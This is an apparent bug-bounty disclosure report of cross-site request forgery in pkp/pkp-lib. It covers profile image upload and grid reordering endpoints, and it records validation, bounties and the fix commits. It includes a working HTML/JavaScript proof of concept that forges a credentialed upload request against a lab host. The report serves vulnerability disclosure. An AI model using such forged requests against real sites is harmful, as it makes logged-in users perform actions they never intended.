Cross-Site Request Forgery (CSRF) in pkp/pkp-lib

Valid

Reported on

Oct 16th 2021


Description

No CSRF protection on the profile image upload endpoint either: /index.php/e/$$$call$$$/tab/user/profile-tab/upload-profile-image.

More endpoints:

Reordering data:

/index.php/e/$$$call$$$/grid/settings/submission-checklist/submission-checklist-grid/save-sequence

/index.php/e/$$$call$$$/grid/settings/genre/genre-grid/save-sequence

PoC for the file upload endpoint

<html>
  <body>
    <script>
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://10.0.2.15:8000/index.php/e/$$$call$$$/tab/user/profile-tab/upload-profile-image", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------moxieboundary1634260375680");
        xhr.withCredentials = "true";
        var body = "-----------------------------moxieboundary1634260375680\r\n" +
          "Content-Disposition: form-data; name=\"name\"\r\n" +
          "\r\n" + "cat.jpg" +
          "\r\n" +
          "-----------------------------moxieboundary1634260375680\r\n" +
          "Content-Disposition: form-data; name=\"uploadedFile\"; ; filename=\"cat.jpg\"\r\n" + 
          "Content-Type: text/xml\r\n" +
          "\r\n" +
          "[FILE_CONTENT_HERE]" + "\r\n" +
          "-----------------------------moxieboundary1634260375680--\r\n"
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
    </script>
  </body>
</html>

Impact

This vulnerability allows an attacker to trick a logged-in user into changing their profile picture.

Occurrences

no token in the upload profile frontend

no token in the upload profile backend

no token in save category grid sequence backend

no token in the save grid sequence backend

We have contacted a member of the pkp/pkp-lib team and are waiting to hear back (a year ago)
haxatron modified the report (a year ago)
Alec Smecher validated this vulnerability a year ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alec Smecher confirmed that a fix has been merged on 169885 a year ago
Alec Smecher has been awarded the fix bounty
Alec Smecher
a year ago

Note that the two CSRF checks are added in separate commits; I flagged one of them as the fix. Both are:

  • https://github.com/pkp/pkp-lib/commit/169885a1de6554b519f264b213d91d4847d1a088
  • https://github.com/pkp/pkp-lib/commit/30180492367caf94919d870032795b201952d9e2